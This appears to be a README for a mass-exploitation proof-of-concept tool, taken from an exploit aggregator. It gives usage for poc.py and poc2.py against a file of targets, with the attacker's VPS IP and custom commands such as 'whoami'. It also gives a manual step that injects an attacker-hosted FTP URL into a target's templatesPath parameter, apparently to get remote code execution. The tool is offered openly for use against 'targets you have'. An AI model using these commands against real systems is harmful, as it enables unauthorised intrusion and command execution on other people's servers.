## https://sploitus.com/exploit?id=9AE9E480-815C-52D0-88B0-60B97877E80D
#### Before you run script again do
```fuser -k 6666/tcp```
### Usage -
```python3 poc.py -f targets.txt -i 127.0.0.1 -pr 4 -t 200```
Custom command can be used like ```python3 poc.py -f targets.txt -i 127.0.0.1 -c "whoami"```
```-i``` is your IP or your vps IP (use that by doing ipconfig / ifconfig.
Like - ```python3 poc.py -f targets.txt -i 165.22.104.140 -pr 4 -t 200```
## Manual exploit , run above poc.py against targets you have, you will see output file with vuln targets
Now what? you have vuln target but wanted to play more? So I have added poc2.py this is for manual test against the target, how to do that?
do ```fuser -k 6666/tcp```
```
1. Run poc2.py (port 6666 started as FTP).
2. Open the browser yourtarget.com/?--templatesPath=ftp://VPS-IP:6666/
3. you will see -
```
![image](https://github.com/user-attachments/assets/bf3f9353-5d11-4365-bcea-1f87e29c0a34)
Written By
Chirag Artani (https://x.com/Chirag99Artani)